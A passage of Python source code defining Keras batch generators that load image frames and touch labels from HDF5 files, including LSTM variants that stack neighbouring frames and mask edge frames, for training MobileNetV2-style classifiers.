maybe???\n hf.create_dataset(label_save_name, data=np.float64(labels_2_save))\n except:\n hf.create_dataset(label_save_name, data=np.float64(labels_2_save))\n hf.close()\n return labels_2_save\n\n\ndef get_total_frame_count(h5_file_list):\n \"\"\"\n\n Parameters\n ----------\n h5_file_list :\n \n\n Returns\n -------\n\n \n \"\"\"\n total_frame_count = []\n for H5_file in h5_file_list:\n with h5py.File(H5_file, 'r') as H5:\n total_frame_count.append(H5['images'].shape[0])\n\n return total_frame_count\n\n\ndef batch_size_file_ind_selector(num_in_each, batch_size):\n \"\"\"batch_size_file_ind_selector - needed for ImageBatchGenerator to know which H5 file index\n to use depending on the iteration number used in __getitem__ in the generator.\n this all depends on the variable batch size.\n \n Example: the output of the following...\n batch_size_file_ind_selector([4000, 4001, 3999], [2000])\n would be [0, 0, 1, 1, 1, 2, 2] which means that there are 2 chunks in the first\n H5 file, 3 in the second and 2 in the third based on chunk size of 2000\n\n Parameters\n ----------\n num_in_each :\n param batch_size:\n batch_size :\n \n\n Returns\n -------\n\n \n \"\"\"\n break_into = np.ceil(np.array(num_in_each) / batch_size)\n extract_inds = np.array([])\n for k, elem in enumerate(break_into):\n tmp1 = np.array(np.ones(np.int(elem)) * k)\n extract_inds = np.concatenate((extract_inds, tmp1), axis=0)\n return extract_inds\n\n\n# file_inds_for_H5_extraction is the same as extract_inds output from the above function\ndef reset_to_first_frame_for_each_file_ind(file_inds_for_H5_extraction):\n \"\"\"reset_to_first_frame_for_each_file_ind - uses the output of batch_size_file_ind_selector\n to determine when to reset the index for each individual H5 file. using the above example\n the out put would be [0, 0, 2, 2, 2, 5, 5], each would be subtracted from the indexing to\n set the position of the index to 0 for each new H5 file.\n\n Parameters\n ----------\n file_inds_for_H5_extraction :\n \n\n Returns\n -------\n\n \n \"\"\"\n subtract_for_index = []\n for k, elem in enumerate(file_inds_for_H5_extraction):\n tmp1 = np.diff(file_inds_for_H5_extraction)\n tmp1 = np.where(tmp1 != 0)\n tmp1 = np.append(-1, tmp1[0]) + 1\n subtract_for_index.append(tmp1[np.int(file_inds_for_H5_extraction[k])])\n return subtract_for_index\n\n\nclass ImageBatchGenerator(keras.utils.Sequence):\n \"\"\" \"\"\"\n\n def __init__(self, batch_size, h5_file_list, label_key='labels'):\n h5_file_list = utils.make_list(h5_file_list, suppress_warning=True)\n num_frames_in_all_H5_files = get_total_frame_count(h5_file_list)\n file_inds_for_H5_extraction = batch_size_file_ind_selector(\n num_frames_in_all_H5_files, batch_size)\n subtract_for_index = reset_to_first_frame_for_each_file_ind(\n file_inds_for_H5_extraction)\n # self.to_fit = to_fit #set to True to return XY and False to return X\n self.label_key = label_key\n self.batch_size = batch_size\n self.H5_file_list = h5_file_list\n self.num_frames_in_all_H5_files = num_frames_in_all_H5_files\n self.file_inds_for_H5_extraction = file_inds_for_H5_extraction\n self.subtract_for_index = subtract_for_index\n self.IMG_SIZE = 96\n\n def __len__(self):\n return len(self.file_inds_for_H5_extraction)\n\n def __getitem__(self, num_2_extract):\n b = self.batch_size\n h = self.H5_file_list\n i = self.file_inds_for_H5_extraction\n H5_file = h[np.int(i[num_2_extract])]\n with h5py.File(H5_file, 'r') as H5:\n # H5 = h5py.File(H5_file, 'r')\n\n images = H5['images']\n num_2_extract_mod = num_2_extract - 
self.subtract_for_index[num_2_extract]\n raw_X = images[b * num_2_extract_mod:b * (num_2_extract_mod + 1)]\n rgb_tensor = self.image_transform(raw_X)\n\n labels_tmp = H5[self.label_key]\n raw_Y = labels_tmp[b * num_2_extract_mod:b * (num_2_extract_mod + 1)]\n H5.close()\n return rgb_tensor, raw_Y\n\n # def __getitem__(self, num_2_extract):\n # b = self.batch_size\n # h = self.H5_file_list\n # i = self.file_inds_for_H5_extraction\n # H5_file = h[np.int(i[num_2_extract])]\n # H5 = h5py.File(H5_file, 'r')\n # # list(H5.keys())\n #\n # images = H5['images']\n # num_2_extract_mod = num_2_extract - self.subtract_for_index[num_2_extract]\n # raw_X = images[b * num_2_extract_mod:b * (num_2_extract_mod + 1)]\n # rgb_tensor = self.image_transform(raw_X)\n #\n # # if self.to_fit:\n # # labels_tmp = H5[self.label_key]\n # # raw_Y = labels_tmp[b*num_2_extract_mod:b*(num_2_extract_mod+1)]\n # # return rgb_tensor, raw_Y\n # # else:\n # return rgb_tensor\n\n def getXandY(self, num_2_extract):\n \"\"\"\n\n Parameters\n ----------\n num_2_extract :\n \n\n Returns\n -------\n\n \n \"\"\"\n b = self.batch_size\n h = self.H5_file_list\n i = self.file_inds_for_H5_extraction\n H5_file = h[np.int(i[num_2_extract])]\n H5 = h5py.File(H5_file, 'r')\n # list(H5.keys())\n\n images = H5['images']\n num_2_extract_mod = num_2_extract - self.subtract_for_index[num_2_extract]\n raw_X = images[b * num_2_extract_mod:b * (num_2_extract_mod + 1)]\n rgb_tensor = self.image_transform(raw_X)\n labels_tmp = H5[self.label_key]\n raw_Y = labels_tmp[b * num_2_extract_mod:b * (num_2_extract_mod + 1)]\n return rgb_tensor, raw_Y\n\n def image_transform(self, raw_X):\n \"\"\"input num_of_images x H x W, image input must be grayscale\n MobileNetV2 requires certain image dimensions\n We use N x 61 x 61 formated images\n self.IMG_SIZE is a single number to change the images into, images must be square\n\n Parameters\n ----------\n raw_X :\n \n\n Returns\n -------\n\n \n \"\"\"\n # rgb_batch = np.repeat(raw_X[..., np.newaxis], 3, -1)\n # rgb_tensor = tf.cast(rgb_batch, tf.float32) # convert to tf tensor with float32 dtypes\n # rgb_tensor = (rgb_tensor / 127.5) - 1 # /127.5 = 0:2, -1 = -1:1 requirement for mobilenetV2\n # rgb_tensor = tf.image.resize(rgb_tensor, (self.IMG_SIZE, self.IMG_SIZE)) # resizing\n # self.IMG_SHAPE = (self.IMG_SIZE, self.IMG_SIZE, 3)\n # return rgb_tensor\n if len(raw_X.shape) == 4 and raw_X.shape[3] == 3:\n rgb_batch = copy.deepcopy(raw_X)\n else:\n rgb_batch = np.repeat(raw_X[..., np.newaxis], 3, -1)\n rgb_tensor = tf.cast(rgb_batch, tf.float32) # convert to tf tensor with float32 dtypes\n rgb_tensor = (rgb_tensor / 127.5) - 1 # /127.5 = 0:2, -1 = -1:1 requirement for mobilenetV2\n rgb_tensor = tf.image.resize(rgb_tensor, (self.IMG_SIZE, self.IMG_SIZE)) # resizing\n self.IMG_SHAPE = (self.IMG_SIZE, self.IMG_SIZE, 3)\n return rgb_tensor\n\n def plot_batch_distribution(self):\n \"\"\" \"\"\"\n # randomly select a batch and generate images and labels\n batch_num = np.random.choice(np.arange(0, self.__len__()))\n samp_x, samp_y = self.getXandY(batch_num)\n\n # look at the distribution of classes\n plt.pie([1 - np.mean(samp_y), np.mean(samp_y)],\n labels=['non-touch frames', 'touch frames'], autopct='%1.1f%%', )\n plt.title('class distribution from batch ' + str(batch_num))\n plt.show()\n\n # generate indices for positive and negative classes\n images_to_sample = 20\n neg_class = [i for i, val in enumerate(samp_y) if val == 0]\n pos_class = [i for i, val in enumerate(samp_y) if val == 1]\n neg_index = 
np.random.choice(neg_class, images_to_sample)\n pos_index = np.random.choice(pos_class, images_to_sample)\n\n # plot sample positive and negative class images\n plt.figure(figsize=(10, 10))\n samp_x = (samp_x + 1) / 2\n for i in range(images_to_sample):\n plt.subplot(5, 10, i + 1)\n plt.xticks([])\n plt.yticks([])\n plt.grid(False)\n _ = plt.imshow(samp_x[neg_index[i]])\n plt.xlabel('0')\n\n plt.subplot(5, 10, images_to_sample + i + 1)\n plt.xticks([])\n plt.yticks([])\n plt.grid(False)\n plt.imshow(samp_x[pos_index[i]])\n plt.xlabel('1')\n plt.suptitle('sample images from batch ' + str(batch_num))\n plt.show()\n\n\ndef image_transform_(IMG_SIZE, raw_X):\n \"\"\"\n input num_of_images x H x W, image input must be grayscale\n MobileNetV2 requires certain image dimensions\n We use N x 61 x 61 formated images\n self.IMG_SIZE is a single number to change the images into, images must be square\n\n Parameters\n ----------\n raw_X :\n\n\n Returns\n -------\n\n\n \"\"\"\n\n if len(raw_X.shape) == 4 and raw_X.shape[3] == 3:\n rgb_batch = copy.deepcopy(raw_X)\n else:\n rgb_batch = np.repeat(raw_X[..., np.newaxis], 3, -1)\n rgb_tensor = tf.cast(rgb_batch, tf.float32) # convert to tf tensor with float32 dtypes\n rgb_tensor = (rgb_tensor / 127.5) - 1 # /127.5 = 0:2, -1 = -1:1 requirement for mobilenetV2\n rgb_tensor = tf.image.resize(rgb_tensor, (IMG_SIZE, IMG_SIZE)) # resizing\n IMG_SHAPE = (IMG_SIZE, IMG_SIZE, 3)\n return rgb_tensor\n\n\nclass ImageBatchGenerator(keras.utils.Sequence):\n \"\"\" \"\"\"\n\n def __init__(self, batch_size, h5_file_list, label_key='labels'):\n h5_file_list = utils.make_list(h5_file_list, suppress_warning=True)\n num_frames_in_all_H5_files = get_total_frame_count(h5_file_list)\n file_inds_for_H5_extraction = batch_size_file_ind_selector(\n num_frames_in_all_H5_files, batch_size)\n subtract_for_index = reset_to_first_frame_for_each_file_ind(\n file_inds_for_H5_extraction)\n # self.to_fit = to_fit #set to True to return XY and False to return X\n self.label_key = label_key\n self.batch_size = batch_size\n self.H5_file_list = h5_file_list\n self.num_frames_in_all_H5_files = num_frames_in_all_H5_files\n self.file_inds_for_H5_extraction = file_inds_for_H5_extraction\n self.subtract_for_index = subtract_for_index\n self.IMG_SIZE = 96\n\n def __len__(self):\n return len(self.file_inds_for_H5_extraction)\n\n def __getitem__(self, num_2_extract):\n b = self.batch_size\n h = self.H5_file_list\n i = self.file_inds_for_H5_extraction\n H5_file = h[np.int(i[num_2_extract])]\n with h5py.File(H5_file, 'r') as H5:\n # H5 = h5py.File(H5_file, 'r')\n\n images = H5['images']\n num_2_extract_mod = num_2_extract - self.subtract_for_index[num_2_extract]\n raw_X = images[b * num_2_extract_mod:b * (num_2_extract_mod + 1)]\n rgb_tensor = self.image_transform(raw_X)\n\n labels_tmp = H5[self.label_key]\n raw_Y = labels_tmp[b * num_2_extract_mod:b * (num_2_extract_mod + 1)]\n H5.close()\n return rgb_tensor, raw_Y\n\n # def __getitem__(self, num_2_extract):\n # b = self.batch_size\n # h = self.H5_file_list\n # i = self.file_inds_for_H5_extraction\n # H5_file = h[np.int(i[num_2_extract])]\n # H5 = h5py.File(H5_file, 'r')\n # # list(H5.keys())\n #\n # images = H5['images']\n # num_2_extract_mod = num_2_extract - self.subtract_for_index[num_2_extract]\n # raw_X = images[b * num_2_extract_mod:b * (num_2_extract_mod + 1)]\n # rgb_tensor = self.image_transform(raw_X)\n #\n # # if self.to_fit:\n # # labels_tmp = H5[self.label_key]\n # # raw_Y = labels_tmp[b*num_2_extract_mod:b*(num_2_extract_mod+1)]\n # # 
return rgb_tensor, raw_Y\n # # else:\n # return rgb_tensor\n\n def getXandY(self, num_2_extract):\n \"\"\"\n\n Parameters\n ----------\n num_2_extract :\n\n\n Returns\n -------\n\n\n \"\"\"\n b = self.batch_size\n h = self.H5_file_list\n i = self.file_inds_for_H5_extraction\n H5_file = h[np.int(i[num_2_extract])]\n H5 = h5py.File(H5_file, 'r')\n # list(H5.keys())\n\n images = H5['images']\n num_2_extract_mod = num_2_extract - self.subtract_for_index[num_2_extract]\n raw_X = images[b * num_2_extract_mod:b * (num_2_extract_mod + 1)]\n rgb_tensor = self.image_transform(raw_X)\n labels_tmp = H5[self.label_key]\n raw_Y = labels_tmp[b * num_2_extract_mod:b * (num_2_extract_mod + 1)]\n return rgb_tensor, raw_Y\n\n def image_transform(self, raw_X):\n \"\"\"input num_of_images x H x W, image input must be grayscale\n MobileNetV2 requires certain image dimensions\n We use N x 61 x 61 formated images\n self.IMG_SIZE is a single number to change the images into, images must be square\n\n Parameters\n ----------\n raw_X :\n\n\n Returns\n -------\n\n\n \"\"\"\n # rgb_batch = np.repeat(raw_X[..., np.newaxis], 3, -1)\n # rgb_tensor = tf.cast(rgb_batch, tf.float32) # convert to tf tensor with float32 dtypes\n # rgb_tensor = (rgb_tensor / 127.5) - 1 # /127.5 = 0:2, -1 = -1:1 requirement for mobilenetV2\n # rgb_tensor = tf.image.resize(rgb_tensor, (self.IMG_SIZE, self.IMG_SIZE)) # resizing\n # self.IMG_SHAPE = (self.IMG_SIZE, self.IMG_SIZE, 3)\n # return rgb_tensor\n if len(raw_X.shape) == 4 and raw_X.shape[3] == 3:\n rgb_batch = copy.deepcopy(raw_X)\n else:\n rgb_batch = np.repeat(raw_X[..., np.newaxis], 3, -1)\n rgb_tensor = tf.cast(rgb_batch, tf.float32) # convert to tf tensor with float32 dtypes\n rgb_tensor = (rgb_tensor / 127.5) - 1 # /127.5 = 0:2, -1 = -1:1 requirement for mobilenetV2\n rgb_tensor = tf.image.resize(rgb_tensor, (self.IMG_SIZE, self.IMG_SIZE)) # resizing\n self.IMG_SHAPE = (self.IMG_SIZE, self.IMG_SIZE, 3)\n return rgb_tensor\n\n def plot_batch_distribution(self):\n \"\"\" \"\"\"\n # randomly select a batch and generate images and labels\n batch_num = np.random.choice(np.arange(0, self.__len__()))\n samp_x, samp_y = self.getXandY(batch_num)\n\n # look at the distribution of classes\n plt.pie([1 - np.mean(samp_y), np.mean(samp_y)],\n labels=['non-touch frames', 'touch frames'], autopct='%1.1f%%', )\n plt.title('class distribution from batch ' + str(batch_num))\n plt.show()\n\n # generate indices for positive and negative classes\n images_to_sample = 20\n neg_class = [i for i, val in enumerate(samp_y) if val == 0]\n pos_class = [i for i, val in enumerate(samp_y) if val == 1]\n neg_index = np.random.choice(neg_class, images_to_sample)\n pos_index = np.random.choice(pos_class, images_to_sample)\n\n # plot sample positive and negative class images\n plt.figure(figsize=(10, 10))\n samp_x = (samp_x + 1) / 2\n for i in range(images_to_sample):\n plt.subplot(5, 10, i + 1)\n plt.xticks([])\n plt.yticks([])\n plt.grid(False)\n _ = plt.imshow(samp_x[neg_index[i]])\n plt.xlabel('0')\n\n plt.subplot(5, 10, images_to_sample + i + 1)\n plt.xticks([])\n plt.yticks([])\n plt.grid(False)\n plt.imshow(samp_x[pos_index[i]])\n plt.xlabel('1')\n plt.suptitle('sample images from batch ' + str(batch_num))\n plt.show()\n\n\ndef image_transform_(IMG_SIZE, raw_X):\n \"\"\"\n input num_of_images x H x W, image input must be grayscale\n MobileNetV2 requires certain image dimensions\n We use N x 61 x 61 formated images\n self.IMG_SIZE is a single number to change the images into, images must be square\n\n 
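A hedged shape sketch (assuming IMG_SIZE=96, matching the generators above): a raw_X of\n shape (N, 61, 61) uint8 in [0, 255] comes back as a float32 tensor of shape (N, 96, 96, 3)\n scaled to [-1, 1], e.g.:\n\n x = np.random.randint(0, 256, (4, 61, 61)).astype('uint8')\n y = image_transform_(96, x) # y.shape == (4, 96, 96, 3); values lie in [-1, 1]\n\n 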
Parameters\n ----------\n raw_X :\n\n\n Returns\n -------\n\n\n \"\"\"\n\n if len(raw_X.shape) == 4 and raw_X.shape[3] == 3:\n rgb_batch = copy.deepcopy(raw_X)\n else:\n rgb_batch = np.repeat(raw_X[..., np.newaxis], 3, -1)\n rgb_tensor = tf.cast(rgb_batch, tf.float32) # convert to tf tensor with float32 dtypes\n rgb_tensor = (rgb_tensor / 127.5) - 1 # /127.5 = 0:2, -1 = -1:1 requirement for mobilenetV2\n rgb_tensor = tf.image.resize(rgb_tensor, (IMG_SIZE, IMG_SIZE)) # resizing\n IMG_SHAPE = (IMG_SIZE, IMG_SIZE, 3)\n return rgb_tensor\n\n\n# finished extractor........\n\n\n# lstm_len = 5\n#\n# batch_size = 10\n# num_2_extract = 24\n\n\nclass ImageBatchGenerator_simple(keras.utils.Sequence):\n\n def __init__(self, batch_size, h5_file_list, label_key='labels', IMG_SIZE=None):\n\n h5_file_list = utils.make_list(h5_file_list, suppress_warning=True)\n num_frames_in_all_H5_files = get_total_frame_count(h5_file_list)\n file_inds_for_H5_extraction = batch_size_file_ind_selector(num_frames_in_all_H5_files, batch_size)\n subtract_for_index = reset_to_first_frame_for_each_file_ind(file_inds_for_H5_extraction)\n self.label_key = label_key\n self.batch_size = batch_size\n self.H5_file_list = h5_file_list\n self.num_frames_in_all_H5_files = num_frames_in_all_H5_files\n self.file_inds_for_H5_extraction = file_inds_for_H5_extraction\n self.subtract_for_index = subtract_for_index\n self.IMG_SIZE = IMG_SIZE\n\n def image_transform(self, raw_X):\n if len(raw_X.shape) >= 4 and raw_X.shape[-1] == 3:\n rgb_batch = copy.deepcopy(raw_X)\n else:\n rgb_batch = np.repeat(raw_X[..., np.newaxis], 3, -1)\n rgb_tensor = rgb_batch\n rgb_tensor = tf.cast(rgb_batch, tf.float32) # convert to tf tensor with float32 dtypes\n rgb_tensor = (rgb_tensor / 127.5) - 1 # /127.5 = 0:2, -1 = -1:1 requirement for mobilenetV2\n if self.IMG_SIZE is not None:\n if len(raw_X.shape) <= 4:\n rgb_tensor = tf.image.resize(rgb_tensor, (self.IMG_SIZE, self.IMG_SIZE)) # resizing\n elif len(raw_X.shape) == 5:\n s = list(raw_X.shape)\n s[-3:-1] = [self.IMG_SIZE, self.IMG_SIZE]\n new_img = np.zeros(s).astype('float32')\n for lstm_i in range(raw_X.shape[1]):\n new_img[:, lstm_i, :, :, :] = tf.image.resize(rgb_tensor[:, lstm_i, ...],\n (self.IMG_SIZE, self.IMG_SIZE)).numpy()\n rgb_tensor = new_img\n else:\n assert 1 == 0, \"shape is screwed up...\"\n # rgb_tensor = tf.cast(rgb_tensor, np.uint8)\n # self.IMG_SHAPE = (self.IMG_SIZE, self.IMG_SIZE, 3)\n return rgb_tensor\n\n def __getitem__(self, num_2_extract):\n h = self.H5_file_list\n i = self.file_inds_for_H5_extraction\n H5_file = h[np.int(i[num_2_extract])]\n num_2_extract_mod = num_2_extract - self.subtract_for_index[num_2_extract]\n i1 = num_2_extract_mod * self.batch_size\n i2 = num_2_extract_mod * self.batch_size + self.batch_size\n with h5py.File(H5_file, 'r') as h:\n out = h['images'][i1:i2]\n out = self.image_transform(out)\n raw_Y = h[self.label_key][i1:i2]\n return out, raw_Y\n\n def __len__(self):\n return len(self.file_inds_for_H5_extraction)\n\n def getXandY(self, num_2_extract):\n rgb_tensor, raw_Y = self.__getitem__(num_2_extract)\n return rgb_tensor, raw_Y\n\n\nclass ImageBatchGenerator_LSTM(keras.utils.Sequence):\n \"\"\" \"\"\"\n\n def __init__(self, lstm_len, batch_size, h5_file_list, label_key='labels', IMG_SIZE=96):\n assert lstm_len % 2 == 1, \"number of images must be odd\"\n h5_file_list = utils.make_list(h5_file_list, suppress_warning=True)\n num_frames_in_all_H5_files = get_total_frame_count(h5_file_list)\n file_inds_for_H5_extraction = batch_size_file_ind_selector(\n 
num_frames_in_all_H5_files, batch_size)\n subtract_for_index = reset_to_first_frame_for_each_file_ind(\n file_inds_for_H5_extraction)\n # self.to_fit = to_fit #set to True to return XY and False to return X\n self.label_key = label_key\n self.batch_size = batch_size\n self.H5_file_list = h5_file_list\n self.num_frames_in_all_H5_files = num_frames_in_all_H5_files\n self.file_inds_for_H5_extraction = file_inds_for_H5_extraction\n self.subtract_for_index = subtract_for_index\n self.IMG_SIZE = IMG_SIZE\n self.lstm_len = lstm_len\n self.get_frame_edges()\n\n def get_frame_edges(self):\n self.all_edges_list = []\n b = self.lstm_len // 2\n s = [b * 2, self.lstm_len, self.IMG_SIZE, self.IMG_SIZE, 3]\n for H5_file in self.H5_file_list:\n with h5py.File(H5_file,\n 'r') as h: # 0(0, 1) 1(0) 3998(-1) 3999(-2, -1) ... 4000(0, 1) 4001(0) 7998(-1) 7999(-2, -1) #0,0 0,1 1,0 3998,-1 3999,-2 3999,-1\n full_edges_mask = np.ones(s)\n edge_ind = np.flip(np.arange(1, b + 1))\n for i in np.arange(1, b + 1):\n full_edges_mask[i - 1, :edge_ind[i - 1], ...] = np.zeros_like(\n full_edges_mask[i - 1, :edge_ind[i - 1], ...])\n full_edges_mask[-i, -edge_ind[i - 1]:, ...] = np.zeros_like(\n full_edges_mask[-i, -edge_ind[i - 1]:, ...])\n all_edges = []\n for i1, i2 in utils.loop_segments(h['frame_nums']): # 0, 1, 3998, 3999 ; 4000, 4001, 7998, 7999; ...\n edges = (np.asarray([[i1], [i2 - b]]) + np.arange(0, b).T).flatten()\n all_edges.append(edges)\n all_edges = np.asarray(all_edges)\n self.all_edges_list.append(all_edges)\n full_edges_mask = full_edges_mask.astype(int)\n self.full_edges_mask = full_edges_mask == 0\n\n def __getitem__(self, num_2_extract):\n h = self.H5_file_list\n i = self.file_inds_for_H5_extraction\n all_edges = self.all_edges_list[np.int(i[num_2_extract])]\n H5_file = h[np.int(i[num_2_extract])]\n num_2_extract_mod = num_2_extract - self.subtract_for_index[num_2_extract]\n with h5py.File(H5_file, 'r') as h:\n b = self.lstm_len // 2\n tot_len = h['images'].shape[0]\n assert tot_len - b > self.batch_size, \"reduce batch size to be less than total length of images minus floor(lstm_len) - 1, MAX->\" + str(\n tot_len - b - 1)\n i1 = num_2_extract_mod * self.batch_size - b\n i2 = num_2_extract_mod * self.batch_size + self.batch_size + b\n edge_left_trigger = abs(min(i1, 0))\n edge_right_trigger = min(abs(min(tot_len - i2, 0)), b)\n x = h['images'][max(i1, 0):min(i2, tot_len)]\n if edge_left_trigger + edge_right_trigger > 0: # in case of edge cases\n pad_shape = list(x.shape)\n pad_shape[0] = edge_left_trigger + edge_right_trigger\n pad = np.zeros(pad_shape).astype('uint8')\n if edge_left_trigger > edge_right_trigger:\n x = np.concatenate((pad, x), axis=0)\n else:\n x = np.concatenate((x, pad), axis=0)\n x = self.image_transform(x)\n s = list(x.shape)\n s.insert(1, self.lstm_len)\n out = np.zeros(s).astype('float32') # before was uint8\n # out = tf.cast(out, tf.float32)\n\n for i in range(self.lstm_len):\n i1 = max(0, b - i)\n i2 = min(s[0], s[0] + b - i)\n i3 = max(0, i - b)\n i4 = min(s[0], s[0] + i - b)\n # print('take ', i3,' to ', i4, ' and place in ', i1,' to ', i2)\n out[i1:i2, i, ...] 
= x[i3:i4, ...]\n out = out[b:s[0] - b, ...]\n i1 = num_2_extract_mod * self.batch_size\n i2 = num_2_extract_mod * self.batch_size + self.batch_size\n raw_Y = h[self.label_key][i1:i2]\n # black out edges from frame to frame\n adjust_these_edge_frames = np.intersect1d(all_edges.flatten(), np.arange(i1, i2))\n for atef in adjust_these_edge_frames:\n # mask_ind = np.where(atef == all_edges)[1][0]\n # out[atef] = out[atef] * (self.full_edges_mask[mask_ind]\n\n mask_ind = np.where(atef == all_edges)[1][0]\n mask_ = self.full_edges_mask[mask_ind]\n out[atef - i1][mask_] = -1\n return out, raw_Y\n\n # gray mask(set array to -1 not 0 ),DONE\n # doesnt fill the edges as expected, DONE\n # outputs format 0-255 not -1 to 1 DONE this was just custom code not from image_tools\n # need to test this with uneven frames\n def __len__(self):\n return len(self.file_inds_for_H5_extraction)\n\n def getXandY(self, num_2_extract):\n \"\"\"\n\n Parameters\n ----------\n num_2_extract :\n\n\n Returns\n -------\n\n \"\"\"\n rgb_tensor, raw_Y = self.__getitem__(num_2_extract)\n return rgb_tensor, raw_Y\n\n def image_transform(self, raw_X):\n \"\"\"input num_of_images x H x W, image input must be grayscale\n MobileNetV2 requires certain image dimensions\n We use N x 61 x 61 formated images\n self.IMG_SIZE is a single number to change the images into, images must be square\n\n Parameters\n ----------\n raw_X :\n\n\n Returns\n -------\n\n\n \"\"\"\n if len(raw_X.shape) == 4 and raw_X.shape[3] == 3:\n rgb_batch = copy.deepcopy(raw_X)\n else:\n rgb_batch = np.repeat(raw_X[..., np.newaxis], 3, -1)\n rgb_tensor = rgb_batch\n # rgb_tensor = tf.cast(rgb_batch, tf.float32) # convert to tf tensor with float32 dtypes\n rgb_tensor = (rgb_tensor / 127.5) - 1 # /127.5 = 0:2, -1 = -1:1 requirement for mobilenetV2 #commented before\n rgb_tensor = tf.image.resize(rgb_tensor, (self.IMG_SIZE, self.IMG_SIZE)) # resizing\n # rgb_tensor = tf.cast(rgb_tensor, np.uint8)# un commented before\n self.IMG_SHAPE = (self.IMG_SIZE, self.IMG_SIZE, 3)\n return rgb_tensor\n\n\nclass ImageBatchGenerator_LSTM_2(keras.utils.Sequence):\n \"\"\" \"\"\"\n\n def __init__(self, lstm_len, batch_size, h5_file_list, label_key='labels', IMG_SIZE=96):\n assert lstm_len % 2 == 1, \"number of images must be odd\"\n h5_file_list = utils.make_list(h5_file_list, suppress_warning=True)\n num_frames_in_all_H5_files = get_total_frame_count(h5_file_list)\n file_inds_for_H5_extraction = batch_size_file_ind_selector(\n num_frames_in_all_H5_files, batch_size)\n subtract_for_index = reset_to_first_frame_for_each_file_ind(\n file_inds_for_H5_extraction)\n # self.to_fit = to_fit #set to True to return XY and False to return X\n self.label_key = label_key\n self.batch_size = batch_size\n self.H5_file_list = h5_file_list\n self.num_frames_in_all_H5_files = num_frames_in_all_H5_files\n self.file_inds_for_H5_extraction = file_inds_for_H5_extraction\n self.subtract_for_index = subtract_for_index\n self.IMG_SIZE = IMG_SIZE\n self.lstm_len = lstm_len\n self.get_frame_edges()\n\n def get_frame_edges(self):\n self.all_edges_list = []\n b = self.lstm_len // 2\n s = [b * 2, self.lstm_len, self.IMG_SIZE, self.IMG_SIZE, 3]\n for H5_file in self.H5_file_list:\n with h5py.File(H5_file,\n 'r') as h: # 0(0, 1) 1(0) 3998(-1) 3999(-2, -1) ... 4000(0, 1) 4001(0) 7998(-1) 7999(-2, -1) #0,0 0,1 1,0 3998,-1 3999,-2 3999,-1\n full_edges_mask = np.ones(s)\n edge_ind = np.flip(np.arange(1, b + 1))\n for i in np.arange(1, b + 1):\n full_edges_mask[i - 1, :edge_ind[i - 1], ...] 
= np.zeros_like(\n full_edges_mask[i - 1, :edge_ind[i - 1], ...])\n full_edges_mask[-i, -edge_ind[i - 1]:, ...] = np.zeros_like(\n full_edges_mask[-i, -edge_ind[i - 1]:, ...])\n all_edges = []\n for i1, i2 in utils.loop_segments(h['frame_nums']): # 0, 1, 3998, 3999 ; 4000, 4001, 7998, 7999; ...\n edges = (np.asarray([[i1], [i2 - b]]) + np.arange(0, b).T).flatten()\n all_edges.append(edges)\n all_edges = np.asarray(all_edges)\n self.all_edges_list.append(all_edges)\n full_edges_mask = full_edges_mask.astype(int)\n self.full_edges_mask = full_edges_mask == 0\n\n def __getitem__(self, num_2_extract):\n h = self.H5_file_list\n i = self.file_inds_for_H5_extraction\n all_edges = self.all_edges_list[np.int(i[num_2_extract])]\n H5_file = h[np.int(i[num_2_extract])]\n num_2_extract_mod = num_2_extract - self.subtract_for_index[num_2_extract]\n with h5py.File(H5_file, 'r') as h:\n b = self.lstm_len // 2\n tot_len = h['images'].shape[0]\n assert tot_len - b > self.batch_size, \"reduce batch size to be less than total length of images minus floor(lstm_len) - 1, MAX->\" + str(\n tot_len - b - 1)\n i1 = num_2_extract_mod * self.batch_size - b\n i2 = num_2_extract_mod * self.batch_size + self.batch_size + b\n edge_left_trigger = abs(min(i1, 0))\n edge_right_trigger = min(abs(min(tot_len - i2, 0)), b)\n x = h['images'][max(i1, 0):min(i2, tot_len)]\n if edge_left_trigger + edge_right_trigger > 0: # in case of edge cases\n pad_shape = list(x.shape)\n pad_shape[0] = edge_left_trigger + edge_right_trigger\n pad = np.zeros(pad_shape).astype('uint8')\n if edge_left_trigger > edge_right_trigger:\n x = np.concatenate((pad, x), axis=0)\n else:\n x = np.concatenate((x, pad), axis=0)\n x = self.image_transform(x)\n s = list(x.shape)\n s.insert(1, self.lstm_len)\n out = np.zeros(s).astype('float32') # before was uint8\n # out = tf.cast(out, tf.float32)\n\n for i in range(self.lstm_len):\n i1 = max(0, b - i)\n i2 = min(s[0], s[0] + b - i)\n i3 = max(0, i - b)\n i4 = min(s[0], s[0] + i - b)\n # print('take ', i3,' to ', i4, ' and place in ', i1,' to ', i2)\n out[i1:i2, i, ...] 
= x[i3:i4, ...]\n            out = out[b:s[0] - b, ...]\n            i1 = num_2_extract_mod * self.batch_size\n            i2 = num_2_extract_mod * self.batch_size + self.batch_size\n            raw_Y = h[self.label_key][i1:i2]\n            # black out edges from frame to frame\n            adjust_these_edge_frames = np.intersect1d(all_edges.flatten(), np.arange(i1, i2))\n            for atef in adjust_these_edge_frames:\n                # mask_ind = np.where(atef == all_edges)[1][0]\n                # out[atef] = out[atef] * (self.full_edges_mask[mask_ind]\n\n                mask_ind = np.where(atef == all_edges)[1][0]\n                mask_ = self.full_edges_mask[mask_ind]\n                out[atef - i1][mask_] = -1\n        return out, raw_Y\n\n    # gray mask (set array to -1 not 0), DONE\n    # doesn't fill the edges as expected, DONE\n    # outputs format 0-255 not -1 to 1 DONE this was just custom code not from image_tools\n    # need to test this with uneven frames\n    def __len__(self):\n        return len(self.file_inds_for_H5_extraction)\n\n    def getXandY(self, num_2_extract):\n        \"\"\"\n\n        Parameters\n        ----------\n        num_2_extract :\n\n\n        Returns\n        -------\n\n        \"\"\"\n        rgb_tensor, raw_Y = self.__getitem__(num_2_extract)\n        return rgb_tensor, raw_Y\n\n    def image_transform(self, raw_X):\n        \"\"\"input num_of_images x H x W, image input must be grayscale\n        MobileNetV2 requires certain image dimensions\n        We use N x 61 x 61 formatted images\n        self.IMG_SIZE is a single number to change the images into, images must be square\n\n        Parameters\n        ----------\n        raw_X :\n\n\n        Returns\n        -------\n\n\n        \"\"\"\n        if len(raw_X.shape) == 4 and raw_X.shape[3] == 3:\n            rgb_batch = copy.deepcopy(raw_X)\n        else:\n            rgb_batch = np.repeat(raw_X[..., np.newaxis], 3, -1)\n        rgb_tensor = rgb_batch\n        # rgb_tensor = tf.cast(rgb_batch, tf.float32) # convert to tf tensor with float32 dtypes\n        rgb_tensor = (rgb_tensor / 127.5) - 1  # /127.5 = 0:2, -1 = -1:1 requirement for mobilenetV2 #commented before\n        rgb_tensor = 